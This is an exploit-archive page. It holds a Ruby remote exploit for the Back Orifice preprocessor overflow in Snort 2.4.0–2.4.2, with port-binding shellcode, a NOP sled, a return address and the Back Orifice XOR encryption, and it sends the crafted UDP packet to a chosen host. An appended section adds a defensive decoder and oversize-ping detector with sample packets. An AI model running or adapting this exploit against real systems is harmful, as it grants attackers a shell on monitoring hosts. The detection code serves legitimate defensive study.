
Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)


#!/usr/bin/ruby -w

#
#
# Version 0.1 (Public)
#
# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
#
# by xwings at mysec dot org
# URL : http://www.mysec.org , somebody needs to update the page
#
# Saying Hi to ....
#
# . All the 1337 c0d3r @ pulltheplug.org
# . Gurus from #rubylang @ freenode.net
# . Skywizard @ somewhere right now
# . HITBSecConf CREW and Team Panda
#
# 03:07 <@mark> hey xwings
# 03:07 <@mark> why don't you come up and see me sometime?
#
# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 3.3.5 (Debian 1:3.3.5-13)
# Snort 2.4.2 , ./configure && make && make install
#
# Use Ruby : http://www.ruby-lang.org
#
#
#

require 'socket'

fathost = ARGV[0]
packetsize = 1069 # ret is 1069
targetport = 9080

# Back Orifice header the Snort preprocessor looks for: magic, length, id, type.
# Built as a binary string so the high bytes concatenate cleanly.
boheader = ("*!*QWTY?" +          # BO magic
            [1096].pack("V") +    # Length ,thanx Russell Sanford
            "\xed\xac\xef\x0d" +  # ID
            "\x01").b             # PING

## Port Bind 3964 . connectback, refer to Russell Sanford's code

shellcode = ("\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8" +
             "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b" +
             "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52" +
             "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2" +
             "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58" +
             "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69" +
             "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81").b

# NOP sled sized so that the return address lands at packet offset 1069
# (17-byte header + 108-byte shellcode + filler).
filler = ("\x90" * (packetsize - (boheader.length + shellcode.length))).b

retadd = [0xbffff370].pack('L')

darthcode = (shellcode + filler + retadd)

# Back Orifice keystream: Microsoft CRT rand() seeded with the default
# BO key 31337 (the seed argument is deliberately ignored, the default is used).
def msrand(seed)
  @holdrand = 31337
end

# holdrand = holdrand * 214013 + 2531011 (mod 2^32); return bits 16..30
def mrand()
  @holdrand = (@holdrand * 214013 + 2531011) & 0xffffffff
  return (@holdrand >> 16) & 0x7fff
end

# XOR every byte of the packet with rand() % 256, the same operation the
# preprocessor applies when it decrypts.
def bocrypt(takepayload)
  encpayload = "".b
  msrand(0)
  takepayload.each_byte do |v|
    encpayload << (v ^ (mrand() % 256))
  end
  return encpayload
end

abort("usage: #{$0} <target host>") unless fathost

UDPSocket.open.send(bocrypt(boheader + darthcode), 0, fathost, targetport)

[2005-11-11]
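The exploit above only shows the sending side. The block below is an added example (not the exploit author's code and not Snort's) that shows the receiving side: it regenerates the same Microsoft CRT rand() keystream with the default key 31337, decrypts a UDP payload, parses the header fields the exploit fills in (magic, length, id, type), and flags a "ping" whose size is far beyond what a ping needs. The header layout is taken from the exploit's own boheader; the BO_PING_MAX_LEN threshold is an assumption for the heuristic, not a Snort constant, and the two sample packets are constructed inline (the second is shaped like the exploit's packet, with the return address at offset 1069).

```ruby
# Receiver-side decoder and oversize-ping check for Back Orifice packets.
# Added example; constants below are assumptions unless noted.
BO_MAGIC        = "*!*QWTY?".b
BO_DEFAULT_KEY  = 31337          # holdrand value BO uses when no password is set
BO_TYPE_PING    = 0x01
BO_HEADER_LEN   = 8 + 4 + 4 + 1  # magic + length + id + type = 17 bytes
BO_PING_MAX_LEN = 64             # assumption: a real ping carries no large body

# Microsoft CRT rand(): holdrand = holdrand*214013 + 2531011 (mod 2^32),
# output is bits 16..30. BO XORs every packet byte with rand() % 256.
class BoStream
  def initialize(key = BO_DEFAULT_KEY)
    @holdrand = key & 0xffffffff
  end

  def next_byte
    @holdrand = (@holdrand * 214013 + 2531011) & 0xffffffff
    ((@holdrand >> 16) & 0x7fff) % 256
  end
end

# XOR is symmetric, so the same routine encrypts and decrypts.
def bo_crypt(data, key = BO_DEFAULT_KEY)
  ks  = BoStream.new(key)
  out = "".b
  data.each_byte { |b| out << (b ^ ks.next_byte) }
  out
end

# Parse an already-decrypted packet; nil when the magic does not match.
def bo_parse(plain)
  return nil unless plain.bytesize >= BO_HEADER_LEN && plain.byteslice(0, 8) == BO_MAGIC
  declared_len, id, type = plain.byteslice(8, 9).unpack("VVC")
  {
    declared_len: declared_len,
    id:           id,
    type:         type,
    body:         plain.byteslice(BO_HEADER_LEN..-1),
    wire_len:     plain.bytesize,
  }
end

# Heuristic: a ping whose wire size or declared length is out of proportion
# to a genuine ping is treated as an overflow attempt.
def bo_suspicious?(pkt)
  return false if pkt.nil?
  pkt[:type] == BO_TYPE_PING &&
    (pkt[:wire_len] > BO_PING_MAX_LEN || pkt[:declared_len] > BO_PING_MAX_LEN)
end

# Decrypt a raw UDP payload, parse it, and return [parsed, suspicious?].
def bo_inspect_wire(wire, key = BO_DEFAULT_KEY)
  pkt = bo_parse(bo_crypt(wire, key))
  [pkt, bo_suspicious?(pkt)]
end

# Build a plaintext ping the way the exploit lays out its header (constructed input).
def bo_build(declared_len, body)
  BO_MAGIC + [declared_len].pack("V") + "\xed\xac\xef\x0d".b +
    [BO_TYPE_PING].pack("C") + body
end

# Constructed samples: a minimal ping, and a packet shaped like the exploit's
# (17-byte header + 1052 NOPs + 4-byte return address = 1073 bytes, ret at 1069).
BENIGN_PING  = bo_crypt(bo_build(17, "".b))
EXPLOIT_LIKE = bo_crypt(bo_build(1096, ("\x90".b * 1052) + [0xbffff370].pack("V")))

if __FILE__ == $0
  [BENIGN_PING, EXPLOIT_LIKE].each do |wire|
    pkt, bad = bo_inspect_wire(wire)
    puts "type=#{pkt[:type]} wire_len=#{pkt[:wire_len]} declared=#{pkt[:declared_len]} suspicious=#{bad}"
  end
end
```

The id field of the exploit's header decodes to 0x0defaced when read little-endian, which is a convenient marker to assert on when checking that the keystream and key are right. Decrypting with any other key destroys the magic, so a parser failure (nil) on a packet you know is BO usually means a non-default password, not a malformed packet.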
Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号 (Beijing ICP filing no. 05056747)